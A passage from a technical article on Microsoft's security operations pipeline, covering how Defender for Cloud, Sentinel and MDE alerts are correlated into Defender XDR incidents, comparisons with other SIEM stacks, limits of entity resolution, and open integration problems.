&lt;td&gt;[@ms-learn-mdc-sql] [@ms-learn-azuresql-atp]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender for Storage&lt;/td&gt;
&lt;td&gt;Storage accounts&lt;/td&gt;
&lt;td&gt;Control plane + blob access patterns&lt;/td&gt;
&lt;td&gt;[@ms-learn-mdc-storage]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender for App Service&lt;/td&gt;
&lt;td&gt;App Service apps&lt;/td&gt;
&lt;td&gt;Process + network signal from the worker&lt;/td&gt;
&lt;td&gt;[@ms-learn-mdc-appservice]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;For the worked example, the relevant plan is Defender for Servers. Because MDE is installed on the host (Defender for Servers Plan 2 includes the MDE license), the MDE sensor&apos;s runtime telemetry feeds into MDC&apos;s detection engine and emits the &lt;code&gt;Suspicious PowerShell command line&lt;/code&gt; MDC alert at 14:07:42 UTC [@ms-learn-mdc-mde-integration] [@ms-learn-mde-onboard-windows]. That alert flows to Defender XDR via the MDC-to-XDR alert-ingestion integration that reached general availability in &lt;strong&gt;March 2024&lt;/strong&gt; (specifically March 13, 2024) [@ms-learn-mdc-xdr-ingest] [@ms-learn-mdc-xdr-concept].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Do not assume MDC posture findings will appear in your Defender XDR incident.&lt;/strong&gt; The MDC-to-XDR integration ingests &lt;strong&gt;alerts only&lt;/strong&gt;, not recommendations and not Secure Score deltas. If a SOC analyst wants posture context on an incident-affected host (e.g., &quot;was this host&apos;s endpoint protection missing per Secure Score?&quot;), they must pivot to the MDC blade or join &lt;code&gt;SecurityRecommendation&lt;/code&gt; from KQL. There is no automatic incident-side enrichment for posture findings as of the documented integration scope [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The CSPM/CWPP separation also explains the multi-cloud story. MDC&apos;s CSPM scope spans Azure, AWS, and GCP via cloud connectors -- you can onboard an AWS account with &lt;code&gt;aws-onboarding&lt;/code&gt; and see your S3 buckets in the Secure Score [@ms-learn-mdc-onboard-aws]. The CWPP plans for non-Azure clouds are narrower: Defender for Servers works on AWS EC2 and on-prem via Azure Arc, Defender for Containers works on EKS and GKE, but several plans (Storage, App Service) are Azure-only. The result is a posture surface that is genuinely multi-cloud and a runtime surface that is mostly Azure-plus-Arc -- which is the layer that actually flows to XDR at hop 6 [@ms-learn-mdc-introduction].&lt;/p&gt;
&lt;h3&gt;6.6 Hop 6 -- The Defender XDR correlation engine and the fan-in&lt;/h3&gt;
&lt;p&gt;The last hop is the merge. The Defender XDR correlation engine reads incoming alerts from all source pipelines, normalizes the entity values they carry, and groups alerts whose entities overlap within a sliding time window into a single incident. The grouping is asymmetric: a higher-confidence alert (e.g., an MDE process-tree alert with a strong &lt;code&gt;ProcessGuid&lt;/code&gt;) can pull in lower-confidence alerts (e.g., a Sentinel rule whose only entity is &lt;code&gt;Host&lt;/code&gt;), but not vice-versa [@ms-learn-xdr-correlation].&lt;/p&gt;

The server-side service that reads alerts from connected sources, computes entity overlap and temporal proximity, and merges related alerts into incidents. The engine is not user-configurable in detail; merge thresholds, time windows, and entity-priority rules are Microsoft-managed defaults [@ms-learn-xdr-correlation] [@ms-learn-defender-xdr-incidents].
&lt;p&gt;The geometry of the fan-in for the worked example is the mirror image of the fan-out in section 5. The same three alerts that arrived at three different timestamps now converge on a single incident object I-7842:&lt;/p&gt;

sequenceDiagram
    autonumber
    participant SEN as Sentinel SecurityAlert
    participant MDC as MDC SecurityAlert
    participant MDE as MDE DeviceAlertEvents
    participant COR as Defender XDR correlator
    participant INC as Incident I-7842
    SEN-&amp;gt;&amp;gt;COR: Host MAL-... ProcessGuid abc at 14:05:04
    MDC-&amp;gt;&amp;gt;COR: Host MAL-... File powershell.exe at 14:07:42
    MDE-&amp;gt;&amp;gt;COR: Host MAL-... ProcessGuid abc at 14:08:11
    Note over COR: match window ≤ 30 min
    COR-&amp;gt;&amp;gt;INC: open incident, attach Sentinel alert
    COR-&amp;gt;&amp;gt;INC: merge: MDE matches on ProcessGuid
    COR-&amp;gt;&amp;gt;INC: merge: MDC matches on Host within window
    INC--&amp;gt;&amp;gt;SEN: backlink to source alert
    INC--&amp;gt;&amp;gt;MDC: backlink to source alert
    INC--&amp;gt;&amp;gt;MDE: backlink to source alert
&lt;p&gt;Three things deserve explicit attention in this fan-in:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The strong-entity priority.&lt;/strong&gt; The MDE alert and the Sentinel alert share &lt;code&gt;ProcessGuid&lt;/code&gt;. Microsoft documents that field as a unique value designed to make event correlation easier across hosts and domains [@ms-learn-sysmon]. The merge between them is unambiguous. The MDC-from-Servers alert only carries &lt;code&gt;Host&lt;/code&gt; and &lt;code&gt;File&lt;/code&gt; -- the MDC plan&apos;s alert grammar does not necessarily emit &lt;code&gt;ProcessGuid&lt;/code&gt; even though the underlying MDE sensor knows it. The MDC alert merges into the incident on the weaker &lt;code&gt;Host&lt;/code&gt; match within the time window.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The Microsoft-managed thresholds.&lt;/strong&gt; The correlation window, the entity-priority rules, and the merge logic are not exposed for customer tuning. They are documented at the policy level -- &quot;alerts that share entities within a time window&quot; -- but the exact heuristics are part of the Defender XDR service [@ms-learn-xdr-correlation]. §9 returns to this opacity as an open problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;What does NOT merge.&lt;/strong&gt; Some categories of source data stay outside the incident graph even when they ought to: cross-workspace Sentinel rules (alerts in a workspace other than the Defender-XDR-connected &quot;primary&quot; one), third-party connector alerts that lack entity mappings, and -- as already underlined -- MDC posture findings of every kind [@ms-learn-mdc-xdr-concept].&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &quot;primary workspace&quot; constraint matters for multi-workspace customers. A Defender XDR tenant connects to exactly one Sentinel primary workspace for the unified secops experience. Sentinel alerts from secondary workspaces still exist as alerts, can still trigger automation rules, and are still queryable via cross-workspace KQL -- but they do not appear in the unified incident graph at security.microsoft.com [@ms-learn-unified-secops] [@ms-learn-move-to-defender]. Customers with regional workspace topologies (e.g., one per Azure region for data-residency reasons) need to plan which workspace is the XDR-connected one.&lt;/p&gt;
&lt;p&gt;For the worked example, hop 6 completes at 14:09:30 UTC: the SOC analyst sees a single incident in their queue, titled &lt;code&gt;Multi-stage incident on one endpoint&lt;/code&gt;, with three correlated alerts on its alerts tab, a unified entity graph showing the host, the user, the parent and child processes, the file hash, and the URL embedded in the encoded command line, and one-click pivots to the MDE timeline, the Sentinel investigation graph, and the MDC alert detail. Three pipelines, one analyst surface, nine minutes thirteen seconds end-to-end.&lt;/p&gt;
&lt;p&gt;That is the full path. The next three sections compare it to what other vendors do, name the theoretical limits any such pipeline has to live with, and walk the open problems that even the best-tuned version of this pipeline still faces.&lt;/p&gt;
&lt;h2&gt;7. Competing approaches: inside and outside the Microsoft fence&lt;/h2&gt;
&lt;p&gt;The architecture in §6 is one answer to &quot;how do I turn endpoint telemetry into a SOC incident.&quot; It is not the only answer. Other detection engines exist both inside Microsoft and outside, with materially different design choices that are useful to compare side-by-side.&lt;/p&gt;
&lt;p&gt;Inside Microsoft, six detection engines run on roughly the same data over the same workspace -- and an architect picking where to put a new detection has to know what each one optimizes for.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Engine&lt;/th&gt;
&lt;th&gt;Where the query runs&lt;/th&gt;
&lt;th&gt;Latency&lt;/th&gt;
&lt;th&gt;Best fit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Sentinel scheduled rule&lt;/td&gt;
&lt;td&gt;Log Analytics KQL, every 5+ min&lt;/td&gt;
&lt;td&gt;5-8 min&lt;/td&gt;
&lt;td&gt;Cross-source SIEM detections, free-form KQL [@ms-learn-sentinel-scheduled-rules]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sentinel NRT rule&lt;/td&gt;
&lt;td&gt;Log Analytics KQL, every 1 min&lt;/td&gt;
&lt;td&gt;1-2 min&lt;/td&gt;
&lt;td&gt;High-priority single-row detections [@ms-learn-sentinel-nrt-rules]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sentinel Fusion&lt;/td&gt;
&lt;td&gt;ML, multi-source&lt;/td&gt;
&lt;td&gt;Hours&lt;/td&gt;
&lt;td&gt;Multistage attack patterns, low-signal corroboration [@ms-learn-sentinel-fusion]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender XDR custom detection&lt;/td&gt;
&lt;td&gt;Advanced hunting KQL, periodic&lt;/td&gt;
&lt;td&gt;5-30 min&lt;/td&gt;
&lt;td&gt;Detections over &lt;code&gt;DeviceProcessEvents&lt;/code&gt; / MDE schema [@ms-learn-sentinel-custom-detections]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDE built-in detections&lt;/td&gt;
&lt;td&gt;In-product behavioural&lt;/td&gt;
&lt;td&gt;Seconds-to-minutes&lt;/td&gt;
&lt;td&gt;Endpoint-local process / file / network signatures [@ms-learn-mde-landing]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDC plan built-in detections&lt;/td&gt;
&lt;td&gt;Per-plan engines&lt;/td&gt;
&lt;td&gt;Seconds-to-minutes&lt;/td&gt;
&lt;td&gt;Per-workload runtime detection (containers, SQL, storage) [@ms-learn-mdc-introduction]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The takeaway is that &lt;strong&gt;Sentinel and Defender XDR custom detections are not interchangeable&lt;/strong&gt;. They read from different schemas (Log Analytics tables vs MDE advanced-hunting tables), they have different governance models (Azure RBAC vs Defender role-based access), and they emit alerts via different paths. The right engine depends on where your telemetry lives. For the worked example, Sysmon in &lt;code&gt;Event&lt;/code&gt; is reached by Sentinel, not by Custom Detections; MDE&apos;s &lt;code&gt;DeviceProcessEvents&lt;/code&gt; for the same host is reached by Custom Detections, not by Sentinel scheduled rules.&lt;/p&gt;
&lt;p&gt;Outside Microsoft, the six widely-deployed alternative stacks each make different trade-offs:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Stack&lt;/th&gt;
&lt;th&gt;Storage&lt;/th&gt;
&lt;th&gt;Query language&lt;/th&gt;
&lt;th&gt;Strength&lt;/th&gt;
&lt;th&gt;Cost shape&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Splunk Enterprise Security&lt;/td&gt;
&lt;td&gt;Splunk indexers&lt;/td&gt;
&lt;td&gt;SPL&lt;/td&gt;
&lt;td&gt;Long-installed, deep app catalog, mature SOAR&lt;/td&gt;
&lt;td&gt;License-tier (GB/day) or workload-based&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Splunk Cloud + ES&lt;/td&gt;
&lt;td&gt;Splunk-managed cloud&lt;/td&gt;
&lt;td&gt;SPL&lt;/td&gt;
&lt;td&gt;Same SPL, SaaS-managed&lt;/td&gt;
&lt;td&gt;Per-ingest workload-priced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Elastic Security&lt;/td&gt;
&lt;td&gt;Elasticsearch&lt;/td&gt;
&lt;td&gt;EQL + ES&lt;/td&gt;
&lt;td&gt;QL&lt;/td&gt;
&lt;td&gt;Open-source community, full-text strength&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google SecOps (Chronicle)&lt;/td&gt;
&lt;td&gt;Google-internal columnar&lt;/td&gt;
&lt;td&gt;YARA-L 2 + UDM&lt;/td&gt;
&lt;td&gt;Petabyte-scale retention, fixed bytes-per-employee pricing&lt;/td&gt;
&lt;td&gt;Per-employee (no per-GB)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS Security Lake + Athena&lt;/td&gt;
&lt;td&gt;S3 + OCSF&lt;/td&gt;
&lt;td&gt;Athena SQL&lt;/td&gt;
&lt;td&gt;Open-schema, bring-your-own-detection&lt;/td&gt;
&lt;td&gt;Per-ingest + per-query&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sigma + open-source SIEM&lt;/td&gt;
&lt;td&gt;Vendor-neutral rule format, translates to many SIEMs&lt;/td&gt;
&lt;td&gt;Sigma YAML&lt;/td&gt;
&lt;td&gt;Portable detection rules&lt;/td&gt;
&lt;td&gt;Free format; SIEM cost varies&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Sigma&lt;/strong&gt; deserves a special mention because it is a &lt;em&gt;rule format&lt;/em&gt;, not a SIEM. Sigma rules describe detections in a vendor-neutral YAML schema and are translated by a converter (&lt;code&gt;sigmac&lt;/code&gt;) into the target SIEM&apos;s native query language -- KQL for Sentinel, SPL for Splunk, ES|QL for Elastic, YARA-L for Google SecOps [@sigmahq-sigma]. The result is that a single Sigma rule for &quot;Office process spawns PowerShell with encoded command&quot; can be deployed across multiple SIEMs without rewriting. The trade-off is that Sigma compiles to the lowest common denominator of expressiveness; complex multi-table joins do not translate cleanly. Microsoft Sentinel supports Sigma rule import via the analytics-rule wizard [@sigmahq-sigma].&lt;/p&gt;
&lt;p&gt;The structural difference that matters most across these stacks is &lt;strong&gt;where the storage and query engine live&lt;/strong&gt;. Splunk on-prem owns its full stack and bills on ingest. Elastic gives you the stack and lets you self-host or buy SaaS. Google SecOps removes the per-GB axis entirely and bills per employee, betting that the value of the SOC is the analyst&apos;s time, not the byte count. AWS Security Lake decomposes further than Microsoft does, exposing S3 directly so you can bring any analytics engine. Microsoft&apos;s design point -- KQL over Log Analytics with grafted XDR correlation -- sits in the middle: more managed than AWS, more opinionated than Elastic, billed per-GB like Splunk but with separable axes.&lt;/p&gt;
&lt;p&gt;There is also a &lt;strong&gt;migration option&lt;/strong&gt; worth knowing about. Microsoft introduced a Sentinel SIEM migration experience in 2024 that uses generative AI to translate detection rules from Splunk SPL to KQL [@ms-learn-sentinel-siem-migration]. The tool is not a complete replacement for human review of every translated rule, but it materially shortens the migration spike that has historically blocked SOCs from switching SIEMs. The existence of such a tool is itself evidence that the SIEM market is becoming more substitutable than it once was -- a SOC&apos;s investment in detection logic is no longer locked to one vendor&apos;s query language.&lt;/p&gt;
&lt;p&gt;For the worked example specifically, every one of the alternative stacks could in principle deliver the same end result -- one incident for a parent-child process-spawn detection. The differences are in the operating model: who owns the storage, who owns the agent, who priced the ingest, and how easily the analyst can pivot from the incident into raw telemetry. Microsoft&apos;s pitch with the unified secops platform is that &quot;all of the above are in one portal.&quot; The honest reading is &quot;the Microsoft-side ones are in one portal, and the third-party feeds you stream into Sentinel still participate via the same &lt;code&gt;SecurityAlert&lt;/code&gt; table.&quot;&lt;/p&gt;
&lt;h2&gt;8. Theoretical limits&lt;/h2&gt;
&lt;p&gt;The six-hop pipeline is mostly an engineering object. But it inherits a few honestly theoretical limits that no amount of clever product design can defeat. Naming them sharply is the difference between an architect who knows what the system cannot do and a buyer who is surprised.&lt;/p&gt;

The general problem of deciding when two records in different data sources refer to the same real-world entity. In the SIEM context, the entities are users, hosts, files, processes, IPs, URLs, and email recipients. Strong identifiers (a hardware-rooted DeviceId, a Microsoft Entra ObjectId, a SHA256 hash) make the problem tractable; weak identifiers (an account name, an IP address, a file name) make it probabilistic [@ms-learn-sentinel-entities].
&lt;p&gt;The first hard limit is that &lt;strong&gt;entity resolution across pipelines is structurally probabilistic&lt;/strong&gt; whenever the strong identifiers are missing. The Defender XDR correlator depends on entity overlap; the worked example merged cleanly because &lt;code&gt;ProcessGuid&lt;/code&gt; was shared between MDE and Sentinel. Take that identifier away and the merge falls back on &lt;code&gt;Host&lt;/code&gt;, which is shared but ambiguous (hostnames are reused, machine accounts get recycled), and ultimately on weaker identifiers like file name or command-line substring. The table below names what identifiers each source pipeline can be relied upon to carry.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Entity type&lt;/th&gt;
&lt;th&gt;Strong identifier (when available)&lt;/th&gt;
&lt;th&gt;Weak fallback&lt;/th&gt;
&lt;th&gt;Pipelines that emit the strong form&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Host&lt;/td&gt;
&lt;td&gt;DeviceId (MDE GUID), Azure resourceId&lt;/td&gt;
&lt;td&gt;Hostname, FQDN&lt;/td&gt;
&lt;td&gt;MDE, MDC for Servers, Sentinel (if mapped)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process&lt;/td&gt;
&lt;td&gt;ProcessGuid (Sysmon/MDE)&lt;/td&gt;
&lt;td&gt;Image path + start time&lt;/td&gt;
&lt;td&gt;Sysmon, MDE, advanced hunting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Account&lt;/td&gt;
&lt;td&gt;Microsoft Entra ObjectId&lt;/td&gt;
&lt;td&gt;UPN, samAccountName&lt;/td&gt;
&lt;td&gt;Microsoft Entra ID logs, MDI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;SHA256&lt;/td&gt;
&lt;td&gt;Filename, MD5&lt;/td&gt;
&lt;td&gt;MDE, Sentinel rules that include hash&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IP&lt;/td&gt;
&lt;td&gt;n/a (probabilistic by definition)&lt;/td&gt;
&lt;td&gt;IP literal&lt;/td&gt;
&lt;td&gt;All&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URL&lt;/td&gt;
&lt;td&gt;Normalized URL with scheme&lt;/td&gt;
&lt;td&gt;Bare host&lt;/td&gt;
&lt;td&gt;MDE, Defender for Office, threat-intel feeds&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Aha #3 -- entity resolution is information-theoretic, not engineering.&lt;/strong&gt; Two records refer to the same entity if and only if their identifiers carry enough joint information to pick that entity out of the space of all entities. When the entity space is small (a few thousand hosts) and the identifier is strong (a DeviceId), the match is determined. When the entity space is large (every IP on the public internet) and the identifier is weak (the bare IP), the match is probabilistic and false-positives accumulate. No correlation engine, however clever, can manufacture information that the source pipeline did not record. The architectural lesson is to &lt;em&gt;invest in strong identifiers upstream&lt;/em&gt; -- in agents, in DCR schemas, in alert grammars -- not to lean on correlator cleverness downstream.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second hard limit is &lt;strong&gt;normalization lossiness&lt;/strong&gt;. ASIM (Advanced Security Information Model), Microsoft&apos;s effort to normalize Sentinel data into common schemas like &lt;code&gt;_Im_ProcessCreate&lt;/code&gt;, makes cross-source queries dramatically easier -- but the normalization is lossy. Fields that exist only in Sysmon (such as the Sysmon-specific &lt;code&gt;IntegrityLevel&lt;/code&gt; value, or the &lt;code&gt;OriginalFileName&lt;/code&gt; from the PE manifest) get dropped on the way into the normalized schema [@ms-learn-sentinel-asim-normalization]. The trade-off is honest and inescapable: a normalized schema is a projection from a richer per-source schema, and projections lose data by construction.&lt;/p&gt;
&lt;p&gt;We can sketch this formally. If $$S$$ is the per-source schema (a set of fields), $$N$$ is the normalized schema, and $$\pi: S \to N$$ is the projection (the ASIM mapping), then the information loss on a single record $$r$$ is&lt;/p&gt;
&lt;p&gt;$$
L(r) = H(r) - H(\pi(r))
$$&lt;/p&gt;
&lt;p&gt;where $$H$$ is the entropy (number of bits) of the record. For a Sysmon ProcessCreate row, $$H(r)$$ is roughly $$\log_2 |S|$$ bits over a thirty-field schema (call it ~150-200 bits of effective entropy after compression of correlated fields); $$H(\pi(r))$$ is around half that after mapping into the much smaller normalized &lt;code&gt;_Im_ProcessCreate&lt;/code&gt; schema. The dropped bits are exactly the fields you cannot query in the normalized form. ASIM is good for cross-source detections that need only common fields; per-source detections that need the long tail of source-specific fields must query the raw source table directly.&lt;/p&gt;
&lt;p&gt;The third limit is &lt;strong&gt;temporal alignment&lt;/strong&gt;. Each pipeline has its own clock: Sysmon timestamps come from the host kernel, MDC alerts from the MDC service back-end, Sentinel &lt;code&gt;TimeGenerated&lt;/code&gt; from the workspace ingestion. Within a single host these clocks are usually close (NTP-synced), but across hosts and across pipelines they can drift by seconds or minutes. The correlator&apos;s &quot;within a time window&quot; merge has to tolerate this drift, which means the window has to be larger than the worst-case clock skew. A larger window means more false-positive merges. There is no way out of this trade-off; only operational tuning between sensitivity and specificity.&lt;/p&gt;
&lt;p&gt;The fourth limit is &lt;strong&gt;rule expressiveness ceiling&lt;/strong&gt;. KQL is Turing-complete in the sense that any computable detection can be expressed if you are willing to write enough of it -- but Sentinel scheduled rules cap query duration, query result size, and join cardinality. Detections that conceptually want to scan a year of data and join against a separately-changing IOC list are &lt;em&gt;expressible&lt;/em&gt; in KQL but &lt;em&gt;not runnable&lt;/em&gt; under Sentinel rule limits. Custom ADX clusters or Spark-on-Synapse can run such queries, at the cost of leaving the unified portal entirely.&lt;/p&gt;
&lt;p&gt;These are the limits any honest architecture has to live with. The Microsoft pipeline does well on the first (when strong identifiers exist), is honest about the second (ASIM is documented as a normalization, not a transparent overlay), tolerates the third (windowed merge), and surfaces the fourth as a Sentinel pricing-and-scope conversation. None of them is a Microsoft-specific defect. They are properties of the problem.&lt;/p&gt;
&lt;h2&gt;9. Open problems&lt;/h2&gt;
&lt;p&gt;The pipeline is fast enough, accurate enough, and -- in the worked example -- correct. It is not finished. Seven open problems remain, in roughly decreasing order of how much they hurt a working SOC today.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. The Sentinel-Azure-portal cutover is on a hard date.&lt;/strong&gt; Microsoft has announced the retirement of the Microsoft Sentinel experience in the Azure portal effective &lt;strong&gt;March 31, 2027&lt;/strong&gt; (extended from the original July 1, 2026 target) [@ms-learn-sentinel-azure-portal-retiring] [@helpnetsec-sentinel-defender-timeline]. After that date, Sentinel can only be operated through the unified Defender portal at &lt;code&gt;security.microsoft.com&lt;/code&gt;. The cutover affects analytics-rule authoring (the Azure-portal rule wizard goes away), automation rules, watchlists, and the investigation graph. Customers with custom dashboards, ARM templates, or automation that targets the Azure-portal Sentinel surface must port them. This is the most concrete migration deadline in this article.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. CWPP-to-XDR coverage is still expanding.&lt;/strong&gt; As of the documented integration scope, MDC for Servers, Containers, SQL, Storage, and App Service alerts flow to Defender XDR [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest]. New CWPP plans (e.g., Defender for APIs as it matures) tend to land first in the MDC blade and only later in the unified incident graph. Customers operationalizing a new MDC plan should check the integration documentation for that specific plan rather than assuming XDR ingestion is automatic.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Posture-finding context still lives in a separate blade.&lt;/strong&gt; As §6.5 established, MDC posture findings do not flow to Defender XDR. A SOC analyst looking at an incident on a host has no incident-side way to see &quot;this host also has a CSPM finding for missing endpoint protection.&quot; The workaround is to &lt;code&gt;join&lt;/code&gt; &lt;code&gt;SecurityRecommendation&lt;/code&gt; against the incident-affected resources via KQL, or to pivot manually to the MDC blade. A first-class &quot;posture context on incident&quot; feature does not exist as of the documented surface area.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. The correlation engine&apos;s heuristics are not user-tunable.&lt;/strong&gt; The Defender XDR correlation engine merges alerts using a Microsoft-managed set of thresholds: time window, entity priority, confidence weighting [@ms-learn-xdr-correlation]. These are not exposed for customer override. A SOC that wants to widen the merge window (because their telemetry has long ingest tails) or tighten the entity-priority (because they distrust hostname matches for shared-name VMs) has no knob to turn. The correlation behaviour is whatever Microsoft ships; tuning happens by raising support cases against perceived false-merges or false-splits.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Custom detection semantics are subtly different from Sentinel rule semantics.&lt;/strong&gt; A KQL detection authored as a Defender XDR Custom Detection runs over the advanced-hunting schema (&lt;code&gt;DeviceProcessEvents&lt;/code&gt;, &lt;code&gt;DeviceFileEvents&lt;/code&gt;, etc.), not over Log Analytics tables [@ms-learn-sentinel-custom-detections] [@ms-learn-advanced-hunting]. The two schemas overlap (you can write conceptually similar detections over both), but the field names, the freshness windows, and the result-size caps differ. An organization with parallel teams authoring detections in both surfaces can end up with two near-duplicate detections that drift apart over time. There is no first-class deduplication or &quot;promote this Sentinel rule to a Custom Detection&quot; workflow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. Logic Apps write-back from Sentinel to MDC has rough edges.&lt;/strong&gt; Sentinel automation rules can invoke Logic Apps playbooks to take response actions [@ms-learn-sentinel-logic-apps-playbooks] [@ms-learn-sentinel-soar]. Writing back to MDC -- for example, suppressing an alert in MDC or creating a Defender for Cloud assessment programmatically -- is possible but requires the playbook to call the MDC REST API directly [@ms-learn-mdc-assessments-rest]. There is no native &quot;MDC action&quot; connector with the breadth of the MDE actions connector. Customers building bidirectional response automation between Sentinel and MDC end up writing HTTP-action playbooks by hand. The MDC REST API for assessments lets you create and update assessment results programmatically, but the surface area for &lt;em&gt;writing back&lt;/em&gt; to MDC (e.g., dismissing or recategorizing an alert) is smaller than the read API and is not symmetric with Sentinel&apos;s native alert-lifecycle actions [@ms-learn-mdc-assessments-rest] [@ms-learn-mdc-custom-recs]. Closing this gap with a first-class connector is on most enterprise customers&apos; wish lists.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;7. Multi-workspace and multi-tenant topologies remain awkward.&lt;/strong&gt; The unified secops experience connects Defender XDR to exactly one Sentinel primary workspace per tenant. Customers with multiple workspaces -- common in regulated industries with data-residency boundaries -- must choose which workspace is the XDR-connected one, and accept that the other workspaces&apos; alerts are visible only inside Sentinel, not in the unified incident graph [@ms-learn-unified-secops] [@ms-learn-move-to-defender]. Multi-tenant MSSPs and customers with subsidiaries on separate Azure tenants face an even harder design problem: there is no single pane across tenants in the unified portal, only the cross-workspace KQL pattern from §4.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;8. Multicloud entity resolution: the EC2-on-AWS case.&lt;/strong&gt; A Windows VM running as an AWS EC2 instance can be brought into Microsoft&apos;s stack through two layers, neither of which produces a single shared identifier. Defender for Cloud&apos;s multicloud connector ingests AWS CloudTrail and EC2 metadata into MDC&apos;s posture surface (CSPM coverage) [@ms-learn-mdc-onboard-multicloud]; Defender for Servers&apos; Arc-based provisioning then installs Azure Monitor Agent and Microsoft Defender for Endpoint on the EC2 host, projecting the box into the Azure tenant&apos;s resource graph as an &lt;code&gt;Microsoft.HybridCompute/machines&lt;/code&gt; Arc resource. Three identifiers therefore describe the same physical workload but never coincide on a single strong identifier: (1) the EC2 ARN &lt;code&gt;arn:aws:ec2:&amp;lt;region&amp;gt;:&amp;lt;account&amp;gt;:instance/&amp;lt;instance-id&amp;gt;&lt;/code&gt;, which is what AWS CloudTrail and the AWS console use; (2) the Arc machine resource ID &lt;code&gt;/subscriptions/&amp;lt;sub&amp;gt;/resourceGroups/&amp;lt;rg&amp;gt;/providers/Microsoft.HybridCompute/machines/&amp;lt;arc-machine-name&amp;gt;&lt;/code&gt;, which is what the Log Analytics &lt;code&gt;_ResourceId&lt;/code&gt; column carries when AMA forwards the Sysmon event; (3) the MDE &lt;code&gt;DeviceId&lt;/code&gt;, a GUID assigned at MDE first-onboarding, which is what the Defender for Servers CWPP alert and the &lt;code&gt;DeviceInfo&lt;/code&gt; advanced-hunting table key on. Bridging the three at query time requires bespoke KQL: lift the Arc machine name from &lt;code&gt;_ResourceId&lt;/code&gt; via &lt;code&gt;extend ArcMachine = tostring(split(_ResourceId, &quot;/&quot;)[-1])&lt;/code&gt;, look up the corresponding &lt;code&gt;DeviceId&lt;/code&gt; in &lt;code&gt;DeviceInfo&lt;/code&gt; keyed by &lt;code&gt;DeviceName&lt;/code&gt;, and &lt;code&gt;join&lt;/code&gt; to a customer-maintained &lt;code&gt;Watchlist&lt;/code&gt; (or external CMDB) that maps Arc machine name -&amp;gt; EC2 instance-id -&amp;gt; EC2 ARN. The pattern works, but every join is a place where the inventory can drift; a renamed EC2 instance or a reimaged host that picks up a new MDE &lt;code&gt;DeviceId&lt;/code&gt; will silently break correlation until the watchlist is refreshed.&lt;/p&gt;

The EC2 sub-example above is the tip of the iceberg. Multi-cloud is its own open problem and worth a separate article. MDC&apos;s CSPM and parts of the CWPP plans (Servers, Containers) cover AWS and GCP via Azure Arc and cloud connectors, but the depth of integration for non-Azure workloads in the unified XDR experience is less than for native Azure workloads. The honest summary is &quot;Azure-first, AWS/GCP-supported, on-prem via Arc.&quot; Designs that are AWS-primary should evaluate AWS Security Lake + a SIEM (Sentinel, Splunk, or Athena) against MDC-on-AWS specifically; the choice is not obvious.
